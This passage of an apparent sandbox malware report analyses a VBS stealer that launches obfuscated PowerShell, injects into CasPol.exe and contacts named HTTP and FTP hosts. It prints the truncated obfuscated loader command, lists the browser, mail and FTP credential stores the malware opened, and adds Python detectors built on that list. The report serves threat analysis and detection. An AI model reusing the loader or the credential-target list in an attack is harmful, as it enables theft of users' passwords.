          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
          Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.1683925145.0000016C0C1E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
          Source: PO-09784893 xlsx.vbs | Binary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 11_2_1FA8B5B8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Memory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh 
grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation (2 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation (2 occurrences)
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara matchFile source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
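The file and registry targets listed above are the credential stores a stealer sweeps in one pass: mail client profiles, FTP/SCP session lists and browser login databases. The detection that falls out of this is not "someone read profiles.ini" (backup and migration tools do that) but "one process that owns none of these stores opened several of them". The Python below is an added example written for this report, not Joe Sandbox code: the store list is copied from the signatures above, the owning process names are assumed for illustration, and the event records (fields image, pid, target) are constructed to resemble Sysmon file/registry telemetry rather than any real export format.

```python
"""Detect a process sweeping the credential stores listed in this report.

Added example, not Joe Sandbox code. The store list is copied from the
"Stealing of Sensitive Information" signatures; the event records and their
field names (image, pid, target) are constructed to resemble Sysmon
file/registry telemetry and are an assumption, not a real export format.
"""
import re
from collections import defaultdict

# Each store is keyed by a regex over the file path or registry key and maps
# to the process names (assumed, for illustration) that legitimately read it.
CREDENTIAL_STORES = {
    r"\\Thunderbird\\profiles\.ini$": {"thunderbird.exe"},
    r"\\Mozilla\\Firefox\\profiles\.ini$": {"firefox.exe"},
    r"\\FileZilla\\recentservers\.xml$": {"filezilla.exe"},
    r"\\SmartFTP\\Client 2\.0\\Favorites\\": {"smartftp.exe"},
    r"\\Microsoft\\Edge\\User Data\\.*\\Login Data$": {"msedge.exe"},
    r"\\Google\\Chrome\\User Data\\.*\\Login Data$": {"chrome.exe"},
    r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities": {"incmail.exe"},
    r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion"
    r"\\Windows Messaging Subsystem\\Profiles\\": {"outlook.exe"},
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions": {"winscp.exe"},
}


def _basename(image):
    """Basename of a Windows image path, lower-cased (works off-Windows)."""
    return image.rsplit("\\", 1)[-1].lower()


def credential_sweeps(events, min_distinct=2):
    """Return {(image, pid): n_stores} for processes that opened at least
    `min_distinct` different credential stores they do not own.

    A single touch is noisy (backup agents, migration tools); a stealer such
    as the CasPol.exe instance in this report hits many stores in one pass,
    so the threshold is on distinct stores, not on raw event count.
    """
    hits = defaultdict(set)
    for ev in events:
        for pattern, owners in CREDENTIAL_STORES.items():
            if re.search(pattern, ev["target"], re.IGNORECASE):
                if _basename(ev["image"]) not in owners:
                    hits[(ev["image"], ev["pid"])].add(pattern)
    return {key: len(stores) for key, stores in hits.items()
            if len(stores) >= min_distinct}


CASPOL = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"

# Constructed events: the nine targets CasPol.exe (PID 7836) opened in the
# report, plus two benign touches that must not fire.
SAMPLE_EVENTS = [
    {"image": CASPOL, "pid": 7836, "target": t} for t in (
        r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
        r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
        r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
        r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml",
        "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\",
        r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
        r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
        r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    )
] + [
    # Chrome reading its own Login Data: owner, ignored.
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pid": 4120,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # A hypothetical backup agent touching one store: below threshold.
    {"image": r"C:\Program Files\BackupAgent\agent.exe", "pid": 900,
     "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
]

if __name__ == "__main__":
    for (image, pid), n in credential_sweeps(SAMPLE_EVENTS).items():
        print(f"{image} (pid {pid}) opened {n} credential stores")
```

Run against the constructed events the only hit is CasPol.exe with nine distinct stores. In production the owner lists need maintaining per environment, and a time window (all touches within a few seconds) tightens the rule further; the distinct-store threshold alone already separates a sweep from a single legitimate read.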

Remote Access Functionality

Source: Yara match | File source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
ATT&CK Matrix by tactic. Techniques with signature matches are listed first with the report's signature-count badges in parentheses, transcribed as printed; the remaining matrix cells had no match.

Initial Access: no matched technique. Unmatched cells: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application.
Execution: Windows Management Instrumentation (2 1 1); Scripting (3 2 1); Command and Scripting Interpreter (2 1); PowerShell (1). Unmatched cells: Cron, Launchd, Scheduled Task.
Persistence: DLL Side-Loading (1). Unmatched cells: Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux).
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (1 1). Unmatched cells: Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux).
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Scripting (3 2 1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (2 4 1); Access Token Manipulation (1); Process Injection (1 1). All cells matched.
Credential Access: OS Credential Dumping (2); Credentials in Registry (1). Unmatched cells: Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow.
Discovery: File and Directory Discovery (1); System Information Discovery (1 1 5); Security Software Discovery (2 2 1); Process Discovery (1); Virtualization/Sandbox Evasion (2 4 1); Application Window Discovery (1). Unmatched cells: Network Sniffing, Network Service Scanning, System Network Connections Discovery.
Lateral Movement: no matched technique. Unmatched cells: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools.
Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (1). Unmatched cells: Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged.
Exfiltration: Exfiltration Over Alternative Protocol (1). Unmatched cells: Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol.
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (2 2). Unmatched cells: Fallback Channels, Multiband Communication, Commonly Used Port, Web Protocols.
Network Effects: no matched technique. Unmatched cells: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station.
Remote Service Effects: no matched technique. Unmatched cells: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features.
Impact: no matched technique. Unmatched cells: Modify System Partition, Device Lockout, Delete Device Data, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction.
Behavior Graph ID: 755440 | Sample: PO-09784893 xlsx.vbs | Start date: 28/11/2022 | Architecture: WINDOWS | Score: 100

Contacted hosts: ftp.mcmprint.net, b3solutionscws.com
Sample-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

Process tree (badge counts as printed in the graph):
wscript.exe (1 1)
  signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
  +-- powershell.exe (25)
  |     dropped: C:\Users\user\AppData\...\u5h0ocqr.cmdline (Unicode)
  |     signatures: Tries to detect Any.run
  |     +-- CasPol.exe (15 11)
  |     |     network: b3solutionscws.com 192.185.145.188 port 80 from local port 49816, UNIFIEDLAYER-AS-1US, United States
  |     |     network: ftp.mcmprint.net 185.31.121.136 port 21 from local port 49819, RAX-ASBG, Bulgaria
  |     |     signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 4 other signatures
  |     +-- csc.exe (3)
  |     |     dropped: C:\Users\user\AppData\Local\...\u5h0ocqr.dll (PE32)
  |     |     +-- cvtres.exe (1)
  |     +-- conhost.exe
  +-- cmd.exe (1)
        +-- conhost.exe
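The graph shows the three links worth alerting on in this chain: wscript.exe spawning powershell.exe and cmd.exe, PowerShell driving csc.exe to compile a DLL into the user's Temp directory (the Add-Type pattern; the full csc.exe command line is in the dropped-files section further down), and a .NET Framework utility, CasPol.exe, started by PowerShell and then opening HTTP and FTP connections. The Python below is an added example for this report, not Joe Sandbox code: it rebuilds the tree from constructed Sysmon-style process-create and network-connect records (field names are an assumption), copies the csc.exe command line, the CasPol.exe PID 7836 and its two peers from the report, and makes up the other PIDs and the wscript/powershell command lines, which the report does not print.

```python
"""Rebuild the process chain from the behaviour graph and flag the links a
detection engineer would alert on: script host spawning a shell, csc.exe
compiling into AppData\\Local\\Temp under PowerShell, and a .NET Framework
utility (CasPol.exe) launched by PowerShell that then connects out.

Added example, not Joe Sandbox code. Events are constructed to resemble
Sysmon Event ID 1 (process create) and 3 (network connect) records; the
field names are an assumption. The csc.exe command line, the CasPol.exe
PID/image/peers are copied from the report; other PIDs and the wscript and
powershell command lines are made up.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# .NET Framework tools commonly abused as injection hosts; CasPol.exe is the
# one used by this sample.
DOTNET_UTILITIES = {"caspol.exe", "installutil.exe", "regsvcs.exe",
                    "regasm.exe", "msbuild.exe"}
TEMP_OUTPUT = re.compile(r'/out:"?[^"\s]*\\AppData\\Local\\Temp\\', re.IGNORECASE)


def _name(image):
    """Basename of a Windows image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(tree, pid):
    """Image basenames from `pid` upward until the parent is unknown."""
    names = []
    while pid in tree:
        names.append(_name(tree[pid]["image"]))
        pid = tree[pid]["ppid"]
    return names


def findings(proc_events, net_events):
    """Return (rule, pid, detail) tuples for the suspicious links."""
    tree = {ev["pid"]: ev for ev in proc_events}
    out = []
    for ev in proc_events:
        name = _name(ev["image"])
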